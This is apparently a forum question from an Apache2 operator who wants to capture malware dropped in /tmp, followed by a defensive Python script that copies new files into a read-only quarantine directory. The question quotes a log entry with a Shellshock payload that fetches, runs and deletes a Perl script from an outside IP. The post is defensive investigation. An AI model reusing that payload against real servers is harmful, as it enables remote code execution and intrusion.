Similar questions have been asked, but the answers either did not work for me or I could not understand them.
I run the Apache2 web server and host several small personal sites. I am subjected to cyber-persecution, or someone is trying to hack me.
The Apache2 access log shows:
195.154.80.205 - - [05/Nov/2015:09:57:09 +0000] "GET /info.cgi HTTP/1.1" 404 464 "-" "() {:;};/usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\";system(\"wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\");"
which is clearly trying (over and over in my logs) to force my server to load "cox.pl" and then run "cox.pl" and then delete "cox.pl".
I really want to know what is in cox.pl, which may be a modified version of Cox-Data-Usage, which is on GitHub.
I would like a script to constantly monitor my /tmp folder and, when a new file is added, copy that file to another directory so I can see what it is doing, or at least trying to do.
I know that I can refuse access, etc., but I want to find out what these hackers are doing and see if I can collect information about this.
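One way to capture files dropped into a watched directory, as an added example that is not part of the original post: it polls the directory and copies every new or changed regular file to a quarantine directory as a read-only, non-executable sample named by its SHA-256 prefix. The function names `snapshot` and `capture_new`, the `.sample` suffix and the 0.2 s interval are assumptions; polling misses a file that is created and deleted within one interval, which inotify-based watching handles better.

```python
import hashlib
import os
import stat
import sys
import time

def snapshot(watch_dir):
    """Map name -> (inode, size, mtime_ns) for regular files; symlinks are not followed."""
    seen = {}
    with os.scandir(watch_dir) as entries:
        for entry in entries:
            try:
                if entry.is_file(follow_symlinks=False):
                    st = entry.stat(follow_symlinks=False)
                    seen[entry.name] = (st.st_ino, st.st_size, st.st_mtime_ns)
            except OSError:
                continue  # file vanished between listing and stat
    return seen

def capture_new(watch_dir, quarantine_dir, previous):
    """Copy new or changed files to quarantine_dir; return (current snapshot, copies made)."""
    current = snapshot(watch_dir)
    copied = []
    for name, meta in current.items():
        if previous.get(name) == meta:
            continue  # unchanged since the last pass
        try:
            with open(os.path.join(watch_dir, name), "rb") as fh:
                data = fh.read()
        except OSError:
            continue  # deleted or unreadable before we got to it
        digest = hashlib.sha256(data).hexdigest()
        dst = os.path.join(quarantine_dir, f"{digest[:16]}_{name[:100]}.sample")
        if not os.path.exists(dst):  # identical content under this name already captured
            with open(dst, "wb") as out:
                out.write(data)
            os.chmod(dst, stat.S_IRUSR)  # owner read-only, never executable
            copied.append(dst)
    return current, copied

if __name__ == "__main__":
    watch, quarantine = sys.argv[1], sys.argv[2]  # e.g. /tmp and a directory only you can read
    os.makedirs(quarantine, mode=0o700, exist_ok=True)
    state = snapshot(watch)  # files already present form the baseline
    while True:
        state, new = capture_new(watch, quarantine, state)
        for path in new:
            print(time.strftime("%Y-%m-%d %H:%M:%S"), "captured", path)
        time.sleep(0.2)
```

Inspect the captured samples in a text editor or an isolated VM, and keep the quarantine directory outside any path the web server can read or execute from.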